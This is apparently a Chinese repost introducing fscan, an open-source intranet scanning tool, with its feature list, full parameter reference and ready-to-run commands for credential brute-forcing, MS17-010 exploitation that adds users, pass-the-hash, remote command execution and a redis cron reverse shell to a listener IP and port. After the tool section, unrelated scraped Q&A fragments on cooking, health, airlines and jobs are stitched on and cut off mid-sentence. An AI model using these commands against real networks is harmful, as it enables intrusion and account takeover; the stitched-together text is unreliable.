全自动化全方位内网综合扫描漏洞扫描开源工具Fscan

　　今天给大家分享一个开源的内网扫描工具，在GitHub平台上面有5.3K Star。具体情况如下：简介
　　fscan 是一款 go 语言编写的内网综合扫描工具，方便「一键自动化、全方位漏扫扫描」。可以让你快速的扫描出内网网络的拓扑结构支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis 批量写公钥、计划任务反弹 shell、读取 win 网卡信息、web 指纹识别、web 漏洞扫描、netbios 探测、域控识别等功能。 主要功能
　　1.信息搜集: 存活探测(icmp)  端口扫描2.爆破功能:  各类服务爆破(ssh、smb、rdp 等)  数据库密码爆破(mysql、mssql、redis、psql、oracle 等)3.系统信息、漏洞扫描:  netbios 探测、域控识别  获取目标网卡信息  高危漏洞扫描(ms17010 等)4.Web 探测功能:  webtitle 探测  web 指纹识别(常见 cms、oa 框架等)  web 漏洞扫描(weblogic、st2 等,支持 xray 的 poc)5.漏洞利用:  redis 写公钥或写计划任务  ssh 命令执行  ms17017 利用(植入 shellcode),如添加用户等6.其他功能:  文件保存  简单用法fscan.exe -h 192.168.1.1/24  (全功能、ms17010、读取网卡信息) fscan.exe -h 192.168.1.1/16  (B段扫描)其他用法fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描) fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥) fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell) fscan.exe -h 192.168.1.1/24 -c ＂whoami;id＂ (ssh 爆破成功后，命令执行) fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口) fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破) fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径) fscan.exe -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 ) fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞) fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块) fscan.exe -hf ip.txt  (以文件导入) fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键支持xray的poc fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080) fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量) fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描) fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理) fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具) fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4) fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行) fscan.exe -h 192.168.x.x/24 -m netbios(-m netbios时,才会显示完整的netbios信息) fscan.exe -h 192.0.0.0/8 -m icmp(探测每个C段的网关和数个随机IP,并统计top 10 B、C段存活数量) 编译命令go build -ldflags=＂-s -w ＂ -trimpath main.go upx -9 fscan.exe (可选,压缩体积) #upx用于二进制文件大小瘦身用的完整参数参考  -c string         ssh命令执行   -cookie string         设置cookie   -debug int         多久没响应,就打印当前进度(default 60)   -domain string         smb爆破模块时,设置域名   -h string         目标ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12   -hf string         读取文件中的目标   -hn string         扫描时,要跳过的ip: -hn 192.168.1.1/24   -m string         设置扫描模式: -m ssh (default ＂all＂)   -no         扫描结果不保存到文件中   -nobr         跳过sql、ftp、ssh等的密码爆破 [＂安全＂]  -nopoc 跳过web poc扫描   -np         跳过存活探测   -num int         web poc 发包速率  (default 20)   -o string         扫描结果保存到哪 (default ＂result.txt＂)   -p string         设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default ＂21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017＂)   -pa string         新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)   -path string         fcgi、smb romote file path   -ping         使用ping代替icmp进行存活探测   -pn string         扫描时要跳过的端口,as: -pn 445   -pocname string         指定web poc的模糊名字, -pocname weblogic   -proxy string         设置代理, -proxy http://127.0.0.1:8080   -user string         指定爆破时的用户名   -userf string         指定爆破时的用户名文件   -pwd string         指定爆破时的密码   -pwdf string         指定爆破时的密码文件   -rf string         指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)   -rs string         redis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)   -silent         静默扫描,适合cs扫描时不回显   -sshkey string         ssh连接时,指定ssh私钥   -t int         扫描线程 (default 600)   -time int         端口扫描超时时间 (default 3)   -u string         指定Url扫描   -uf string         指定Url文件扫描   -wt int         web访问超时时间 (default 5)   -pocpath string         指定poc路径   -usera string         在原有用户字典基础上,新增新用户   -pwda string         在原有密码字典基础上,增加新密码   -socks5         指定socks5代理 (as: -socks5  socks5://127.0.0.1:1080)   -sc         指定ms17010利用模块shellcode,内置添加用户等功能 (as: -sc add) [＂安全＂] 部分使用截图fscan.exe -h 192.168.x.x  (全功能、ms17010、读取网卡信息)
　　fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写公钥)
　　fscan.exe -h 192.168.x.x -c   ＂whoami;id＂   (ssh 命令)
　　fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键支持xray的poc
　　fscan.exe -h 192.168.x.x -p 139 (netbios探测、域控识别,下图的[+]DC代表域控)
　　资料参考:https://github.com/shadow1ng/fscan

菠菜面怎么才能做出翠绿翠绿的颜色？在家做菠菜面干净卫生，小孩吃也很健康，我来分享一下平时在家的做法做面材料普通面粉菠菜盐做法1菠菜洗净焯水，取出沥干水分，挤掉大部分水分。2挤干水分的菠菜切碎，尽可能用刀来回细细密密性传播疾病的原理是什么？性传播疾病，这个说法，其实不如称之为性传播感染，因为性传播感染包括了那些没有症状的疾病！而很多时候，没有症状的传染病反而是更加危险的，事实上也是，很多性传播感染早期是没有任何症状或花蛤怎么做好吃？欢迎关注我的头条号厨道大叔每天分享各种家常美食做法！花蛤也叫花甲，肉味鲜美营养丰富，蛋白质含量高，是一道非常受欢迎的菜肴，非常容易买到的家常菜，但是很多人都是喜欢在饭店或者大排档点阿联酋航空为什么会有郑州到银川的航班？阿联酋航空在中国没有第八航权，其虽然开通了郑州至迪拜中转银川的航线，但中间不能在银川下客货，只能上客货，所以在携程去哪都看不到郑州至银川的票务信息。根据我国民航局的官方解释，航权指在北京，上下班出行花1个小时以上是怎样的体验？家住长辛店云岗这边，单位在金台夕照。每天六点半起床，七点之前上321，一般七点半到六里桥，吃个早饭，头八点进地铁站，以前是九号线换六号换十号，因为这样快，但是人特多，没座位。现在是如何避免下一代遗传银屑病？银屑病俗称牛皮癣，是一种慢性炎症性皮肤病，病程较长，有易复发倾向，有的病例几乎终生不愈。该病发病以青壮年为主，对患者的身体健康和精神状况影响较大。临床表现以红斑，鳞屑为主，全身均可新疆的阿克苏都有哪些壮观的景点？各旅游网上都有对阿克苏景点的排名，现收集整理，将排名前五的梳理如下，希望对你有用第一名天山神秘大峡谷票价45元位置库车县城217国道1025号靠北一侧，距库车县以北64KM天山神秘同样是5000元的工资，体制内和体制外的差距到底有多大？同样是5000元的工资，体制内和体制外的差距是很大的。一单单从数字上看好像一样，没什么区别，其实不然。体制内工资只是收入的一部分，各种奖金和补贴（比如绩效奖综治奖车补降温费等等）又当兵好还是在外打工好，当兵回来以后还能找到工作吗？看自己选择咯，能当兵锻炼自己，为国家贡献一份力量也不错啊！而且现在退役士兵安置条例第二十九条规定，退伍士兵符合下列条件之一的，由人民政府安排工作（1）士官服现役满12年的（2）服现田志希在社交平台喊话樊振东，希望搭档双打，他们会不会搭档成功？韩国乒乓球名将田志希，近日在社交平台喊话樊振东，希望搭档双打，她的目的何在？作为一名从事体育项目的运动员，都有一个梦想成为世界冠军，但是所有体育项目就那么多，不是每一个运动员都可以互联网时代下，大家怎么看待互联网，说说你的想法？互联网是把双利剑，有利有弊，应该全面看待。优点1互联网增进人与人之间的交流，信息传播快，使交流更便捷更有时效性2是很好的传播媒介。方便了许多大型考试的报名和分数的查询，也能作为老师